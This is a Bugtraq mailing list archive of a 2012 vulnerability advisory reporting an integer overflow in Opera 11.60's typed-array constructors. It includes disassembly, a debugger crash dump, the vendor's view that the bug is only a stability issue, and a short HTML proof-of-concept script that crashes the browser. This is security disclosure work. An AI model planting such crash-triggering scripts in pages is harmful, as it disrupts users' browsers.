Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

[CAL-2012-0004] opera array integer overflow

From: Code Audit Labs <vulnhunt () gmail com>
Date: Thu, 02 Feb 2012 10:36:41 +0800
CAL-2012-0004 opera array integer overflow


1 Affected Products
=================
11.60 and prior


2 Vulnerability Details
=====================
Code Audit Labs http://www.vulnhunt.com has discovered a integer overflow vulnerability in array functions like 
Int32Array,Int16Array... .
Opear vendor say "We have reproduced the problem, and determined that it does not have any security implications, since the crash is a caused by a memory fill operation which the webpage have no control over, and this operation will always crash. It is therefore classified as a stability issue, not a security issue. "
we still insist on that it is a security issue or not should accord to root cause of this bug instead of is it exploitable or not. because you think it is unexploitable, someone can exploit it via deeply research. 

So if most people of Security Community think this is a security issue,
please assign to a CVE number.


3 Analysis
=========
Int16Array(2147483647) example
memory corrupt happen if satisfy with following Conditions
1: x*2  >2
2:x*2!=00
3: (x*2-1)+0x1f overflow 32bits.

so the length of malloc is (x*2-1)+0x1f
memset(eax+0x10,0,x*2) cause memory corrupt


text:5C769F57
.text:5C769F57 loc_5C769F57: ; CODE XREF: sub_5C769DCE+17Cj 
.text:5C769F57                 mov     eax, [esp+48h+var_20] ; var_20 is 2
.text:5C769F5B imul eax, [esp+48h+var_3C] ; var_3C is 80000001 
.text:5C769F60                 cmp     eax, [esp+48h+var_3C]
.text:5C769F64                 jb      short loc_5C769F37
.text:5C769F66                 mov     [esp+48h+size], eax
.text:5C769F6A                 mov     eax, [ebp+arg_0]
.text:5C769F6D                 call    sub_5C14A6E8
.text:5C769F72                 push    [esp+48h+size]  ; size
.text:5C769F76                 push    dword ptr [eax] ; int
.text:5C769F78                 push    [ebp+arg_0]     ; int
.text:5C769F7B                 call    sub_5C765B6D
.text:5C769F80                 add     esp, 0Ch

...

.text:5C46A598
.text:5C46A598 arg_0           = dword ptr  4
.text:5C46A598 size            = dword ptr  8
.text:5C46A598
.text:5C46A598                 mov     edx, [esp+arg_0]
.text:5C46A59C                 push    esi
.text:5C46A59D                 mov     esi, [esp+4+size]
.text:5C46A5A1                 test    esi, esi
.text:5C46A5A3                 jz      short loc_5C46A5AA
.text:5C46A5A5                 lea     eax, [esi-1]
.text:5C46A5A8                 jmp     short loc_5C46A5AC
.text:5C46A5AA ; --------------------------------------------------------------------------- 
.text:5C46A5AA
.text:5C46A5AA loc_5C46A5AA: ; CODE XREF: sub_5C46A598+Bj 
.text:5C46A5AA                 xor     eax, eax
.text:5C46A5AC
.text:5C46A5AC loc_5C46A5AC: ; CODE XREF: sub_5C46A598+10j 
.text:5C46A5AC                 mov     ecx, [edx+8]
.text:5C46A5AF                 add     eax, 1Fh
.text:5C46A5B2                 push    0
.text:5C46A5B4                 and     eax, 0FFFFFFF8h
.text:5C46A5B7                 push    eax
.text:5C46A5B8                 push    edx
.text:5C46A5B9                 call    sub_5C019DA0
ext:5C765BF7 loc_5C765BF7: ; CODE XREF: sub_5C765B6D+50j 
.text:5C765BF7                 push    [ebp+size]      ; size
.text:5C765BFA                 lea     eax, [ebx+10h]
.text:5C765BFD                 push    0               ; c
.text:5C765BFF                 push    eax             ; dst
.text:5C765C00                 call    memset




4 Exploitable?
============
who known?


5 Crash info:
===============
(d10.ff4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=01fff21d ebx=00000000 ecx=0367ffb0 edx=00000076 esi=019c5ff8 edi=03610e68 eip=675b347e esp=02314de0 ebp=02314e24 iopl=0 nv up ei pl nz na pe cy cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010207 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Opera\Opera.dll - 
Opera!OpGetNextUninstallFile+0x1961c:
675b347e 660f7f4150 movdqa xmmword ptr [ecx+50h],xmm0 ds:0023:03680000=???????????????????????????????? 
0:000> .exr -1
ExceptionAddress: 675b347e (Opera!OpGetNextUninstallFile+0x0001961c)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000001
   Parameter[1]: 03680000
Attempt to write to address 03680000
0:000> kp
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong. 
02314e24 00000000 Opera!OpGetNextUninstallFile+0x1961c



6 POC:
====
open a html with following content

<script>
//这些全是crash
Int32Array(1073741823)
Float32Array(1073741823)
Float64Array(1073741823)
Int32Array(1073741823)
Uint32Array(1073741823)
Int16Array(2147483647)
ArrayBuffer(4294967295)
</script>




7 About Code Audit Labs:
=====================
Code Audit Labs secure your software,provide Professional include source
code audit and binary code audit service.
Code Audit Labs:" You create value for customer,We protect your value"
http://www.VulnHunt.com
Previous By Date Next
Previous By Thread Next

Current thread: